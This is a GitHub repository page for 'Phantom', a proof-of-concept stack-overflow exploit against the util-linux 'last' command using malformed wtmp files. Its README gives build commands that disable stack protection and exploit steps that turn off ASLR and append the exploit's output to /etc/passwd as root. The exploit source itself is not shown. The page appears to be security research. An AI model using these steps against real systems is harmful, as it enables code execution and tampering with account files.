-
Notifications
You must be signed in to change notification settings - Fork 0
catatonicprime/phantom
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
# Phantom (last exploit) ## Description last is vulnerable to a Stack Overflow when processing malformed wtmp/btmp files. The overflow occurs in the is_phantom function when the utmpx->ut_line is not NULL terminated. A pre-requisite to reach the vulnerable code is that the user in the ut_user field must be present in /etc/passwd. The ut_user field will most likely be where your return address for the function will be stored, but the ut_user field may also flow into the ut_host field. ## Build (last) This has been developed on a raspberry pi running Raspbian. ``` sudo apt install autoconf git clone --recurse-submodules https://github.com/catatonicprime/phantom && cd phantom/util-linux ./autogen.sh CFLAGS="-ggdb -fno-stack-protector -O0 -z execstack" ./configure && make -j 4 last && mv last ../ ``` ## Usage Steps to exploit vulnerable systems (tested on a raspberry pi)... 1) Build phantom (experiment with offsets, etc.) 2) Patch /etc/passwd (for now), this can be done as root by running phantom like so: ```./phantom >> /etc/passwd``` 3) exploit ``` echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # disable ASLR gcc phantom.c -o phantom sudo su ./phantom >> /etc/passwd exit [patch with necessary user] ./phantom ./last -f mtmp [repeat as necessary, for ASLR] ```
About
No description, website, or topics provided.
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published